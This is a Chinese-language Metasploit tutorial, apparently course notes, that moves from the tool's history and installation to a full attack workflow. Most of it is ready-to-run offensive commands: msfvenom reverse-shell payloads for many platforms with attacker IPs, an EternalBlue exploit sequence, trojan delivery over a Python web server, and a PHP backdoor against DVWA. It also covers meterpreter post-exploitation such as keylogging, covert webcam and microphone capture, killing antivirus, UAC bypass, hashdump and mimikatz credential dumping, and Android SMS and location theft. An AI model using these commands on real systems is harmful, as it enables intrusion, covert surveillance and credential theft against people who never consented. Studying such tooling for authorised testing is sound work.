MSF使用详解

MSF使用详解

  • 01 MSF发展史
  • 02 Linux安装MS
  • 03 kali更新msf
  • 04 Windows安装MSF课件
  • 05 MSF图形界面Viper
  • 06 MSF目录结构
  • 07Metasploit的核心模块
  • 08-09msfvenom常用参数(更新)
  • 10-11 msfconsole漏洞利用流程
  • 12 meterpreter介绍
  • 13 PHP后门反弹连接演示文档
  • 14 后渗透之访问文件系统
  • 15 后渗透之上传下载文件
  • 16 后渗透之屏幕截图
  • 17 后渗透之键盘记录
  • 18 后渗透之创建账户(Windows)
  • 19 后渗透之调用音频设备录音
  • 20 后渗透之提权
  • 21 后渗透之获取登录密码(Windows)
  • 22 后渗透之远程监控(Windows)
  • 23 后渗透之调用摄像头

01 MSF发展史

1 Metasploit-发展史

MSF使用详解_第1张图片

Metasploit框架使Metasploit具有良好的可扩展性,它的控制接口负责发现漏洞、攻击漏洞,提交漏洞,然后通过一些接口加入攻击后处理工具和报表工具。Metasploit框架可以从一个漏洞扫描程序导入数据,使用关于有漏洞主机的详细信息来发现可攻击漏洞,然后使用有效载荷对系统发起攻击,有效载荷就是在发现漏洞之后开发一种可行的攻击方法。其用于提取本地系统密码、安装其他软件或控制硬件等的模块,这些功能很像以前BO2K等工具所具备的功能。

2004年

2004年8月,在拉斯维加斯开了一次世界黑客交流会–叫黑帽简报(Black Hat Briefings). 在这个会议上,一款叫Metasploit 的攻击和渗透工具备受众黑客关注,出尽了风头。 Metasploit 是同 HD Moore 和 Spoonm等4名年轻人开发的,这款免费软件可以帮助黑客攻击和控制计算机,安全人员也可以利用 Metasploit 来加强系统对此类工具的攻击。Metasploit 的演示吸引了来自“美国国防部”和“国家安全局”等政府机构的众多安全顾问和个人,正如 Spoonm 在演讲中所说的, Metasploit 很简单,只需要求“找到目标,单击和控制”即可。 2004年 Metasploit 的发布在安全界引发了强烈的“地震”。

MSF使用详解_第2张图片

2005年

2005年6月,西雅图效区的微软公司总部园区内的管理情报中心,开了一次“蓝帽”会议。几百名微软公司的工程师和众多外界专家及黑客都被邀请进入微软帝国的中心。在会议中的黑客攻击演示中,当 Moore 向系统程序员们说明使用 Metasploit 测试系统对抗入侵的可靠程度时,Metasploit 让微软公司的开发人员再次感到不安。在程序员们看来,Metasploit 将会使系统安全面临严重的考验。 Metasploit (MSF) 在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,提供开发,测试和使用恶意代码,这个环境为渗透测试,为shellcode 编写和漏洞研究提供了一个可靠平台。 Metasploit框架直到2006年发布的2.7版本都用Perl脚本语言编写,由于Perl的一些缺陷,开发者于2007年底使用Ruby语言重写了该框架。到2007年年底,Spoonm和马特·米勒已经离开了项目。从2008年发布的3.2版本开始,该项目采用新的3段式BSD许可证。

2009年

2009年10月21号,漏洞管理解决公司Rapid7收购Metasploit项目。Rapid7承诺成立专职开发团队,仍然将源代码置于3段式BSD许可证下。

2 BSD许可证

相较于GPL许可证和MPL许可证的严格性,BSD许可证就宽松许多了,一样是只需要附上许可证的原文,不过比较有趣的是,它还要求所有进一步开发者将自己的版权资料放上去,所以拿到以BSD许可证发行的软件可能会遇到一个小状况,就是这些版权资料许可证占的空间比程序还大。

MSF使用详解_第3张图片

3 Metasploit发展前景

MSF使用详解_第4张图片

02 Linux安装MS

1 乌班图安装MSF

环境准备:

vm虚拟机

Ubuntu桌面版镜像

打开终端 输入 sudo su 获取root权限

然后输入命令

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

然后赋755权限 并执行安装

chmod 755 msfinstall && ./msfinstall

2 直接安装kali系统

第一种vm虚拟机 kali

第二种 iso安装镜像

首先咱们进入kali官网下载kali

https://www.kali.org/get-kali/#kali-bare-metal 选择安装版镜像

03 kali更新msf

登录kali

1 打开终端获取root权限

            获取root权限 可以在终端 输入 sudo su  然后输入登录密码获取root权限

2 开始更新

首先先添加更新源

进入 etc/apt/ 目录

打开 sources.list 需要使用root权限执行

MSF使用详解_第5张图片

deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

#阿里云kali更新源

deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

#163 DEBIAN源

deb http://mirrors.163.com/debian wheezy main non-free contrib

deb-src http://mirrors.163.com/debian wheezy main non-free contrib deb http://mirrors.163.com/debian wheezy-proposed-updates main non-free contrib

deb-src http://mirrors.163.com/debian wheezy-proposed-updates main non-free contrib

deb-src http://mirrors.163.com/debian-security wheezy/updates main non-free contrib

MSF使用详解_第6张图片

​ apt-get update

​ apt-get install metasploit-framework

3 如果更新时显示update无效的错误!

MSF使用详解_第7张图片

输入下面几个命令修复

wget -q -O - https://archive.kali.org/archive-key.asc | apt-key add

apt-get clean

apt-get update

4 如果报:
E: Unmet dependencies. Try ‘apt --fix-broken install’ with no packages (or specify a solution).

​ apt --fix-broken install

04 Windows安装MSF课件

1 下载metasploit

首先咱们进入metasploit官网

https://www.metasploit.com/

MSF使用详解_第8张图片

点击 Download 下载

或者直接访问这个 地址

https://www.metasploit.com/download

进入这个页面 点击 Metasploit Framework 下面的 Download

MSF使用详解_第9张图片

会访问这个地址

https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers

如果你不能打开GitHub 我们可以通过镜像服务器 访问

https://hub.fastgit.org/rapid7/metasploit-framework/wiki/Nightly-Installers

MSF使用详解_第10张图片

这边给大家提供更多的国内可用镜像

#官网镜像(可以用来clone push等,但是不能登录)

https://github.com.cnpmjs.org/
https://git.sdut.me/

#github常用的镜像

https://hub.fastgit.org

https://git.sdut.me/

http://github-mirror.bugkiller.org/
#api镜像
https://api.git.sdut.me/

然后找到Windows版本的下载

点击 latest Windows installer 下载 最新版本

点击 view older builds 下载历史版本

image.png

2 安装metasploit并配置环境变量

安装前关闭win自带的杀毒 和卸载第三方杀毒

添加环境变量

C:\metasploit-framework\bin

3 启动并使用

首次启动 需要初始化数据库

终端中输入 msfdb init

启动MSF框架

终端中输入 msfconsole

05 MSF图形界面Viper

MSF图形化界面Viper(炫彩蛇)下载与使用

Viper是一款图形化内网渗透工具,将内网渗透过程中常用的战术及技术进行模块化及武器化.

集成杀软绕过,内网隧道,文件管理,命令行等基础功能.

当前已集成70+个模块,覆盖初始访问/持久化/权限提升/防御绕过/凭证访问/信息收集/横向移动等大类.

在Kali Linux上安装Docker

apt-get update

#使用apt安装docker

apt-get install -y docker.io

#设置开机启动 systemctl start docker

#检查启动状态 docker version

安装docker-compose

curl -L https://get.daocloud.io/docker/compose/releases/download/1.25.5/docker-compose-uname -s-uname -m > /usr/bin/docker-compose

#给赋可执行状态 chmod +x /usr/bin/docker-compose

#设置安装目录

export VIPER_DIR=/root/VIPER

#执行如下命名生成安装目录,并进入安装目录

mkdir -p $VIPER_DIR && cd $VIPER_DIR

执行如下命令生成docker-compose.yml

如果你看到的命令是乱的 https://note.youdao.com/s/GdzSJnWD 看这个文档

tee docker-compose.yml <<-‘EOF’ version: “3” services: viper: image: registry.cn-shenzhen.aliyuncs.com/toys/viper:latest container_name: viper-c network_mode: “host” restart: always volumes: - ${PWD}/loot:/root/.msf4/loot - ${PWD}/db:/root/viper/Docker/db - ${PWD}/module:/root/viper/Docker/module - ${PWD}/log:/root/viper/Docker/log - ${PWD}/nginxconfig:/root/viper/Docker/nginxconfig command: [“VIPER_PASSWORD”] EOF

设置登录密码

Viper不允许使用默认密码,diypassword替换为自定义密码密码

export VIPER_PASSWORD=输入你的密码

写入密码到docker-compose.yml

sed -i “s/VIPER_PASSWORD/$VIPER_PASSWORD/g” docker-compose.yml

#使用命令查看一下配置

cat docker-compose.yml

创建启动Viper

cd $VIPER_DIR docker-compose up -d

启动viper

docker-compose start

等待15s系统启动,访问

  • https://ip:60000
  • 登录. 用户名:root 密码: 自定义密码

在终端内输入 ip a 查看本机ip

  • 我的IP是192.168.3.31 那么我在浏览器里就访问 https://192.168.3.31:60000 登录名是 root 密码是 我上面设置的root

例如: 我的ip是 192.168.3.31 那么访问炫彩蛇的IP就是 192.168.3.31:60000

注意:

所有的docker-compose命令必须在安装目录执行才会有效果

06 MSF目录结构

kali终端中输

/usr/share/metasploit-framework

然后输入 ls 查看

MSF使用详解_第11张图片

MSF使用详解_第12张图片

MSF使用详解_第13张图片

要记住的一些模块

modules:目录里面存放渗透使用的 辅助模块 编码模块 利用模块 攻击载荷 后渗透模块

plugins: 这个模块需要用load加载,主要提供数据库连接插件 和 各种要用到的插件。

tools:包含一些有用的脚本和零散的工具。

scripts:目录里面存放都是meterpreter利用的脚本。

db:数据放在这个目录里

data:存放使用到的文件,比如密码字典、meterpreter、passivex、vnc、dlls等工具和一些用户接口代码,msfweb和一些其他模块用到的数据文件

lib:库文件都保存在这个目录里

07Metasploit的核心模块

msf的模块都放在

/usr/share/metasploit-framework/modules/这个目录下

MSF使用详解_第14张图片

1 auxiliary:辅助模块,辅助渗透(端口扫描、登录密码爆破、漏洞验证等)

2 exploits:漏洞利用模块,包含主流的漏洞利用脚本,通常是对某些可能存在漏洞的目标进行漏洞利用。

3 payloads:攻击载荷,主要是攻击成功后在目标机器执行的代码,比如反弹shell的代码

4 post:后渗透阶段模块,漏洞利用成功获得meterpreter之后, 向目标发送的一些功能性

指令,如:提权等

5 encoders: 编码器模块,主要包含各种编码工具,对payload进行编码加密,以便绕过入侵检测和过滤系统

6 evasion:躲避模块,用来生成免杀payload

7 nops:这里主要放着调整shellcode 前置nop指令长度的工具(不理解没关系)

Kali中的 msfvenom 取代了msfpayload和msfencode,常用于生成后门木马

msfpayload是MSF攻击荷载生成器,用于生成shellcode和可执行代码。
msfencode是MSF编码器。


08-09msfvenom常用参数(更新)

一 、msfvenom 常用参数

-l
列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all

-p
指定需要使用的payload(攻击荷载)。

-f
指定输出格式

Executable formats:Asp、aspx、aspx-exe、axis2、dll、elf、elf-so、exe、exe-only、exe-service、exe-smallhta-psh、jar、jsp、loop-vbs、macho、msi、msi-nouac、osx-app、psh、psh-cmd、psh-net、psh-reflection、python-reflection、vba、vba-exe、vba-psh、vbs、war;

Transform formats:base32、base64、bash、c、csharp、dw、dword、hex、java、js_be、js_le、num、perl、pl、powershell、ps1、py、python、raw、rb、ruby、sh、vbapplication、vbscript;

-e
指定需要使用的encoder(编码器)编码免杀。

-a
指定payload的目标架构

选择架构平台:x86 | x64 | x86_64
Platforms:windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe

-o
保存payload文件输出。

-b
设定规避字符集,比如: '\x00\xff’避免使用的字符

-n
为payload预先指定一个NOP滑动长度

-s
设定有效攻击荷载的最大长度生成payload的最大长度,就是文件大小。

-i
指定payload的编码次数

-c
指定一个附加的win32 shellcode文件

-x
指定一个自定义的可执行文件作为模板
例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。

-k
保护模板程序的动作,注入的payload作为一个新的进程运行
例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。

-v
指定一个自定义的变量,以确定输出格式


二、各平台生成payload命令


Windows

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.3.33 LPORT=4444 -e x86/shikata_ga_nai -b ‘\x00\x0a\xff’ -i 10 -f exe -o payload.exe


Mac

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=192.168.3.33 LPORT=4444 -f macho -o payload.macho


Android

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4567 -o payload.apk


Powershell

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=192.168.1.1 LPORT=8888 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1


Linux

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f elf -o payload.elf


php

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=8888 -f raw > shell.php


aspx

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=8888 -f aspx -o payload.aspx


JSP

msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.jsp


war

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f raw - o payload.war


nodejs

msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.js


python

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.py


perl

msfvenom -p cmd/unix/reverse_perl LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.pl


ruby

msfvenom -p ruby/shell_reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.rb


lua

msfvenom -p cmd/unix/reverse_lua LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.lua


windows shellcode

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f c


linux shellcode

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f c


mac shellcode

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f c


10-11 msfconsole漏洞利用流程

一、阶段划分:

漏洞利用分为 前期交互 情报搜集 威胁建模 漏洞分析 .渗透利用 后渗透利用 报告 这几个阶段

1.前期交互阶段:

与客户组织进行交互讨论,确定范围,目标等

​ 这个阶段大家可以理解为情报收集前阶段,主要是为了找到目标 确认范围

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pFAfZr8y-1666167673706)(10-11 msfconsole漏洞利用流程.assets/1643165117094.png)]

2.情报搜集阶段:

获取更多目标组织信息,

| 外围信息搜索 - Google

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-GWPRHdwP-1666167673707)(10-11 msfconsole漏洞利用流程.assets/1643165139006.png)]

​ 主机探测与端口扫描 如 -Nmap

​ 服务扫描 利用metasploit中的auxiliary/scanner/中的服务扫描模块,可以对靶机中的服务版本等信息进行扫描

​ 网络漏洞扫描 -OpenVAS、Nessus等

​ 其他工具扫描 py脚本扫描

3.威胁建模阶段:

理清头绪,确定出最可行的漏洞利用通道,这个建模阶段写的文档不是给自己看的 是给整个团队看的 方便多人合作

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-vViQWSs2-1666167673707)(10-11 msfconsole漏洞利用流程.assets/1643165166875.png)]

​ 这个阶段主要是根据收集到的情报进行整理 ,理清漏洞利用思路。

4.漏洞分析阶段:

搜索可获取的渗透代码资源

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CFjTB6YY-1666167673707)(10-11 msfconsole漏洞利用流程.assets/1643165182827.png)]

​ 这个阶段主要 挑选匹配可能存在的漏洞利用模块,shellcode

5.渗透利用阶段:

找出安全漏洞,入侵系统

​ 这个阶段尝试利用漏洞 ,配置监控,开始漏洞利用

6.后渗透利用阶段:

Meterpreter,实施操作

​ 这个阶段 就开始实施相关数据下载 后门维持 提权等操作

7.报告阶段:

漏洞利用渗透测试报告 (详细报告编写看 渗透测试报告课程)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qvh0t4qD-1666167673707)(10-11 msfconsole漏洞利用流程.assets/1643165204135.png)]

| 这个阶段主要是对本次渗透进行总结,概述总体上包括 时间、人员、漏洞利用范围、技术手段等等。我们需要在这部分确定漏洞利用执行的时间范围、参与漏洞利用的人员及联系方式、约定的漏洞利用范围和一些漏洞利用过程中采用的技术、工具描述。写清 前期交互 情报搜集 威胁建模 漏洞分析 .渗透利用 后渗透利用 漏洞利用结果 安全建议 等内容

在撰写的过程中,需要特别注意的是:漏洞描述切忌不可过于简单,一笔带过;在安全建议部分避免提出没有实际意义的安全建议,比如加强安全意识;报告结构混乱不堪,太多复杂的专业术语,比如绕狗、x站等等;

二、实际操作(举例)

主机范围和目标已确定

1 情报搜集

基于msf发现内网存活主机

search 搜索

msf终端内输入 search scanner type:auxiliary

可用于发现主机的模块

auxiliary/scanner/discovery/arp_sweep # 基于ARP发现内网存活主机

auxiliary/scanner/discovery/udp_sweep # 基于UDP发现内网存活主机

auxiliary/scanner/ftp/ftp_version # 发现FTP服务

auxiliary/scanner/http/http_version # 发现HTTP服务

auxiliary/scanner/smb/smb_version # 基于smb发现内网存活主机

基于netbios发现内网存活主机

基于snmap发现内网存活主机

基于ICMP发现内网存活主机

2 威胁建模


经过第一步情报收集 我们通过arp发现了 目标机器ip

然后通过对目标机器的ip扫描 我们知道了 目标机器开通了 80端口 有web服务 开了ftp端口 有文件服务

开了 smb

最终决定对smb相关的漏洞进行利用

备选方案通过植入木马的方式进行利用


3 漏洞分析

第一步先查看smb利用漏洞有哪些 比如永恒之蓝

1 查询msf与永恒之蓝相关的 模块

使用命令 search ms17_010

2 然后我们利用了一个永恒之蓝的 扫描模块

use auxiliary/scanner/smb/smb_ms17_010

3 输入 options 查看扫描模块需要配置的参数

3.1 然后我们配置了rhost (rhost指的是目标主机ip)

set rhost ip

4 然后我们执行扫描 输入 run

发现了 可能存在漏洞的主机

4 渗透利用


1 加载 永恒之蓝漏洞利用模块

use exploit/windows/smb/ms17_010_eternalblue

2 输入 options 查看扫描模块需要配置的参数

3.1 然后我们配置了rhost (rhost指的是目标主机ip)

set rhost ip

3.2 然后我们配置了 lhost (lhost指的是 监控主机或攻击机 ip)

set lhost ip

3.3 然后我们配置了 lport (指的是监控的端口 )

set lport ip

注意端口必须没有被占用

4 然后我们执行扫描 输入 run 执行永恒之蓝漏洞利用

但是发现失败 提示 模块已经利用了 但是没有返回对应 session

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ERkkSXqK-1666167673708)(10-11 msfconsole漏洞利用流程.assets/bffdb79061ad4b0aa92d2dfde83e9f1b.png)]

5 备选方案通过植入木马的方式进行利用


1 我们知道目标机器是win系统 所以使用msfvenom 生成一个win平台的木马

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp

LHOST=192.168.3.33 LPORT=4446 -e x86/shikata_ga_nai -b ‘\x00\x0a\xff’ -i 10 -f exe -o payload.exe

2 漏洞生成后 通过启动一个py服务将木马上传到目标机器

python -m SimpleHTTPServer 80

3 配置监控程序我们使用了

use exploit/multi/handler

3 输入 options进入配置

3.1 然后我们配置了 lhost (lhost指的是 监控主机或攻击机 ip)

set lhost ip

3.2然后我们配置了 lport (指的是监控的端口 )

set lport ip

注意端口必须和msfvenom 生成的木马端口一样才行

4 配置攻击载荷 payload

set payload windows/meterpreter/reverse_tcp

5 执行利用等待目标机器执行木马

6 目标机器执行了木马

利用成功并获得meterpreter


5 后渗透利用

进入新文档

6 报告阶段

12 meterpreter介绍

一、 Meterpreter是什么

Meterpreter是Metasploit框架中的一个利器,作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后会返回一个由我们控制的通道,可用于远程执行命令!
Metasploit提供了各个主流平台的Meterpreter版本,包括Windows、Linux,同时支持x86、x64平台,另外,Meterpreter还提供了基于PHP和Java语言的实现。Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。不需要访问目标主机磁盘,所以也没什么入侵的痕迹。除上述外,Meterpreter还支持Ruby脚本形式的扩展。所以Ruby语言还很有必要了解下。

二、Meterpreter中常用的反弹类型

1.reverse_tcp
这是一个基于TCP的反向链接反弹shell, 使用起来很稳定

三、Meterpreter的常用命令

1.基本命令

help# 查看Meterpreter帮助

background#返回,把meterpreter后台挂起
bgkill# 杀死一个 meterpreter 脚本
bglist#提供所有正在运行的后台脚本的列表
bgrun#作为一个后台线程运行脚本
channel#显示活动频道
sessions -i number # 与会话进行交互,number表示第n个session,使用session -i 连接到指定序号的meterpreter会话已继续利用
sesssions -k number #与会话进行交互
close# 关闭通道
exit# 终止 meterpreter 会话
quit# 终止 meterpreter 会话
interact id #切换进一个信道
run#执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有autoroute,hashdump,arp_scanner,multi_meter_inject等
irb# 进入 Ruby 脚本模式
read# 从通道读取数据write# 将数据写入到一个通道
run和bgrun# 前台和后台执行以后它选定的 meterpreter 脚本
use# 加载 meterpreter 的扩展
load/use#加载模块
Resource#执行一个已有的rc脚本

2 常用命令

2.1 针对安卓手机的一些命令

获取手机通讯录: dump_contacts

获取短信记录:dump_sms

控制实验手机发短信:send_sms -d 15330252525 -t
“hello”

获取实验手机GPS定位信息:geolocate

获取实验手机Wi-Fi定位信息:wlan_geolocate

控制实验手机录音:record_mic
-d 5

获取实验手机相机设备:webcam_list

控制实验手机拍照 :webcam_snap

直播实验手机摄像头:webcam_stream

2.2 针对Windows的一些命令

查看进程:ps

查看当前进程号:getpid

查看系统信息:sysinfo

查看目标机是否为虚拟机:run
post/windows/gather/checkvm

查看完整网络设置:route

查看当前权限:getuid

自动提权:getsystem

关闭杀毒软件:run post/windows/manage/killav

启动远程桌面协议:run post/windows/manage/enable_rdp

列举当前登录的用户:run post/windows/gather/enum_logged_on_users

查看当前应用程序:run post/windows/gather/enum_applications

抓取目标机的屏幕截图:load espia ; screengrab

获取相机设备:webcam_list

控制拍照 :webcam_snap

直播摄像头:webcam_stream

控制录音:record_mic

查看当前处于目标机的那个目录:pwd

查看当前目录:getlwd

导出当前用户密码哈希 run hashdump

用户名:SID:LM哈希:NTLM哈希:::

也可以使用下面这个命令导出 权限更高 run windows/gather/smart_hashdump

抓取自动登录的用户名和密码 run windows/gather/credentials/windows_autologin

直接获取明文密码(注意这个功能需要获取系统权限 获取系统权限需要输入getsystem)

首选终端输入 load kiwi 加载kiwi

creds_all:列举所有凭据
creds_kerberos:列举所有kerberos凭据
creds_msv:列举所有msv凭据
creds_ssp:列举所有ssp凭据
creds_tspkg:列举所有tspkg凭据
creds_wdigest:列举所有wdigest凭据
dcsync:通过DCSync检索用户帐户信息
dcsync_ntlm:通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create:创建黄金票据
kerberos_ticket_list:列举kerberos票据
kerberos_ticket_purge:清除kerberos票据
kerberos_ticket_use:使用kerberos票据
kiwi_cmd:执行mimikatz的命令,后面接mimikatz.exe的命令
lsa_dump_sam:dump出lsa的SAM
lsa_dump_secrets:dump出lsa的密文
password_change:修改密码
wifi_list:列出当前用户的wifi配置文件
wifi_list_shared:列出共享wifi配置文件/编码

3.文件系统命令

cat c:\boot.ini#查看文件内容,文件必须存在
del c:\boot.ini #删除指定的文件
upload /root/Desktop/netcat.exe c:\ # 上传文件到目标机主上,如upload setup.exe C:\windows\system32
download nimeia.txt /root/Desktop/ # 下载文件到本机上如:download C:\boot.ini /root/或者download C:\“ProgramFiles”\Tencent\QQ\Users\295****125\Msg2.0.db /root/
edit c:\boot.ini # 编辑文件
getlwd#打印本地目录
getwd#打印工作目录
lcd#更改本地目录
ls#列出在当前目录中的文件列表
lpwd#打印本地目录
pwd#输出工作目录
cd c:\ #进入目录文件下
rm file #删除文件
mkdir dier #在受害者系统上的创建目录
rmdir#受害者系统上删除目录
dir#列出目标主机的文件和文件夹信息
mv#修改目标主机上的文件名
search -d d:\www -f web.config #search 文件,如search -d c:\ -f
.doc
meterpreter > search -f autoexec.bat #搜索文件
meterpreter > search -f sea
.bat c:\xamp\
enumdesktops #用户登录数

13 PHP后门反弹连接演示文档

一、 环境准备

1 DVWA靶场

DVWA下载:https://codeload.github.com/ethicalhack3r/DVWA/zip/master

注意:配置DVWA环境 准备PHP7.0以上,和 Nginx环境
1 配置数据库密码 配置 config/config.inc.php.dist 文件(注意后门的 .dist要通过重命名删掉)
2 使用浏览器访问 http://XxIP/setup.php
3 红字问题解决
4 缺少key 直接替换下面2句 或者 访问https://www.google.com/recaptcha/admin/create
$_DVWA[ ‘recaptcha_public_key’ ] = ‘6LdJJlUUAAAAAH1Q6cTpZRQ2Ah8VpyzhnffD0mBb’;
$_DVWA[ ‘recaptcha_private_key’ ] = ‘6LdJJlUUAAAAAM2a3HrgzLczqdYp4g05EqDs-W4K’;
5 allow_url_include: Disabled 提示没开启
找到php目录里的php.ini allow_url_include 将后面参数OFF 改成On 修改完成重启Nginx生效

2 Metasploit任意平台

可以是Windows版,可以是kali自带版

二、Metasploit配置监控及攻击载荷

1 配置监控-使用handler模块

use exploit/multi/handler

img 2 配置攻击载荷设置payload

第一步设置payload

set payload php/meterpreter/reverse_tcp

第二步设置 lhost 和 lport

set lhost xxxip ;

set lport xxx端口;

img

3 生成php后门执行攻击获得meterpreter

新建一个终端在终端内输入

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.3.23 lport=4456 R>shell.php

MSF使用详解_第15张图片

3.2 传播- 使用Python简单的web服务

python -m SimpleHTTPServer 80

MSF使用详解_第16张图片

将shell.php

3.3 执行攻击获得meterpreter

img

run 或者exploit

获取到meterpreter 我们就可以做渗透操作了

比如 观看屏幕 可以在meterpreter里输入

run vnc

查看当前账号可以在meterpreter里输入

getuid

14 后渗透之访问文件系统

一、后渗透之访问文件系统

1.文件交互指令

ID Command Description
1 cat 读取文件内容
2 cd 切换靶机目录
3 cp 复制文件到目标
4 mv 移动到目标
5 chmod 修改文件权限(比如chmod 777 shell.elf)
6 del / rm 删除靶机文件
7 dir 打印靶机目录
8 mkdir 在靶机上创建目录
9 rmdir 删除靶机目录
10 edit 编辑文件
11 getlwd 打印本地目录
12 getwd 打印靶机目录
13 lcd 更改本地目录
14 lls 列出本地目录
15 ls 列出靶机文件目录
16 lpwd 打印本地目录
17 pwd 打印工作目录
19 search 搜索文件 详情search -h

Linux权限理解

chmod 777 {文件名.后缀}

chmod 777 shell.elf

15 后渗透之上传下载文件

ID Command Description
1 upload 传文件到靶机
2 download 从靶机下载文件

16 后渗透之屏幕截图

ID Command Description
1 screenshot 截图(Windows)

17 后渗透之键盘记录

ID Conmmand Description
1 keyscan_start 启动键盘记录(Windows)
2 keyscan_dump 导出键盘(Windows)
3 keyscan_stop 停止键盘记录(Windows)

18 后渗透之创建账户(Windows)

一、环境准备

1 MSF-Metasploit Framework

2 一台获取到meterpreter的靶机

二、实际操作

1、先看下目标靶机已存在用户 meterpreter中输入:run post/windows/gather/enum_logged_on_users

2、使用getgui创建 一个用户名为 msb 密码为 123456 的账户

run getgui -u msb -p 123456

run getgui -u {用户名}-p {密码}

进入win的运行输入netplwiz 可以查看账户创建情况

[-] Insufficient privileges, account was not be created. 看到这个提示就需要先提权(获取到system)

2.1 绕过UAC提权

use exploit/windows/local/ask

19 后渗透之调用音频设备录音

一、环境准备
MSF-Metasploit Framework
一台安装手机或者模拟器
二、实践

record_mic 包含4个可选参数 分别为

-d 是设置录音时长的

-f 设置未见路径的

-h 查看帮助的

-p 控制自动播放的

一条简单的录音语句

record_mic -d 10 -p true

20 后渗透之提权

一、环境准备

1 MSF-Metasploit Framework

2 一台windiows靶机

二、实战

1 提权方法(Windows)查看当前获得用户的权限 meterpreter 中输入: getuid

方法一、 meterpreter中输入:getsystem

方法二、使用msf模块提权

要想提权必须是已经拿到meterpreter 然后将当前meterpreter 后台 meterprerer中输入 background

1、 查看可用模块 MSF终端中输入 search bypassuac 查看提权模块

2、 选择一个适合当前系统的提权模块 我这边使用的是win10系统

那我们使用:use exploit/windows/local/bypassuac_windows_store_reg 尝试提权

这个模块不行就换一个 use exploit/windows/local/bypassuac_sluihijack

或者 use exploit/windows/local/bypassuac_dotnet_profiler

3 配置模块使用参数 终端内输入: show options

4 可以看到需要配置 session 终端内输入:set session {需要提权的session id}

5 执行提权 终端内输入:run

6 获取到meterpreter后 我们在终端内 输入getuid 看实际还没有提权成功 需要在还终端内在输入 getsystem 获取权限

7 获取权限完成后 输入getuid 即可看到 已经获取到SYSTEM 最高权限了

看到这个证明已经将权限提升成功

21 后渗透之获取登录密码(Windows)

一、环境准备

1 MSF-Metasploit Framework

2 一台windiows靶机

二、实战

首先获得一个有SYSTEM权限的meterpreter

1 抓取自动登录账户密码

2 导出SAM数据库本地账户密码文件

3 导出密码哈希

4 使用kiwi模块获取


1 很多人喜欢给在计算机设置自动登录 我们可以通过抓取自动登录的账户密码

run windows/gather/credentials/windows_autologin

如果提示这证明本机并没有配置自动登录

2 还可以通过导出SAM数据库中的本地用户账号(注意需要提权到SYSTEM)

run post/windows/gather/smart_hashdump

用户名 SID LM哈希: NTLM哈希1:::
mb 1000 aad3b435b51404eeaad3b435b51404ee 32ed87bdb5fdc5e9cba88547376818d4

3 使用 hashdump 获取密码(注意需要提权到SYSTEM才能使用)

终端内输入 run hashdump

使用在线解析工具 https://www.cmd5.com/

NTLM哈希 例子:32ed87bdb5fdc5e9cba88547376818d4

4 使用load kiwi(使用kiwi模块需要system权限)

kiwi_cmd 模块可以让我们使用mimikatz的全部功能, mimikatz 的命令直接在kiwi_cmd里直接使用

5.1 终端输入 load kiwi

5.2 creds_all 直接获取密码

5.3 使用 kiwi_cmd sekurlsa::logonpasswords 获取密码

ID kiwi参数和描述
1 creds_all:列举所有凭据
2 creds_kerberos:列举所有kerberos凭据
3 creds_msv:列举所有msv凭据
4 creds_ssp:列举所有ssp凭据
5 creds_tspkg:列举所有tspkg凭据
6 creds_wdigest:列举所有wdigest凭据
7 dcsync:通过DCSync检索用户帐户信息
8 dcsync_ntlm:通过DCSync检索用户帐户NTLM散列、SID和RID
9 golden_ticket_create:创建黄金票据
10 kerberos_ticket_list:列举kerberos票据
